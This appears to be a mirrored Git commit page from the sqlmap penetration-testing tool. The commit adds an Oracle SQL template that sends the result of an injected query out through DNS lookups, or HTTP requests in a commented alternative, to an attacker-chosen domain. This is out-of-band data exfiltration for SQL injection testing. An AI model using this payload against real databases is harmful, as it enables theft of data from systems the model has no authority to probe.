mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2026-08-04 06:50:14 +00:00
refactoring for issue #51
This commit is contained in:
parent
25eca9d671
commit
d3da3f5c52
17 changed files with 23 additions and 21 deletions
2
procs/oracle/dns_request.sql
Normal file
2
procs/oracle/dns_request.sql
Normal file
|
|
@ -0,0 +1,2 @@
|
|||
SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
|
||||
# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
|
||||
Loading…
Add table
Add a link
Reference in a new issue